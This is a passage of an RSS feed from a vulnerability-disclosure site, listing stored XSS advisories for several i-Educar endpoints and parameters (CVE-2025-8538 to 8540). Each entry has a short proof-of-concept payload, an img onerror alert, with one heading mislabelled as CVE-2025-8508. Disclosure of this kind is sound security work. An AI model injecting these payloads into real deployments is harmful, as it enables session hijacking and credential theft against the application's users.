        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-tiposnovo&amp;#34;&amp;gt;CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-tiposnovo&amp;#34;&amp;gt;CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8538/image.png&amp;#34;
	width=&amp;#34;614&amp;#34;
	height=&amp;#34;248&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8538/image_hu_e726bbb8f011c269.png 480w, /p/cve-2025-8538/image_hu_2443b37b14c56128.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parameter “name”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;247&amp;#34;
		data-flex-basis=&amp;#34;594px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8538/image-1.png&amp;#34;
	width=&amp;#34;603&amp;#34;
	height=&amp;#34;240&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8538/image-1_hu_a11c807a5cc2d863.png 480w, /p/cve-2025-8538/image-1_hu_e38f31cce2d09ff0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parameter “description”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;251&amp;#34;
		data-flex-basis=&amp;#34;603px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8539</title>
        <link>https://www.cvehunters.com/p/cve-2025-8539/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8539/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8539-cross-site-scripting-xss-stored-endpoint-public_distrito_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8539: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8539-cross-site-scripting-xss-stored-endpoint-public_distrito_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8539: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8539/image.png&amp;#34;
	width=&amp;#34;642&amp;#34;
	height=&amp;#34;260&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8539/image_hu_837fe8e7d394bbec.png 480w, /p/cve-2025-8539/image_hu_26c8ccd795f751a6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;246&amp;#34;
		data-flex-basis=&amp;#34;592px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8540</title>
        <link>https://www.cvehunters.com/p/cve-2025-8540/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8540/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8540-cross-site-scripting-xss-stored-endpoint-public_municipio_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8540: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8540-cross-site-scripting-xss-stored-endpoint-public_municipio_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8540: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
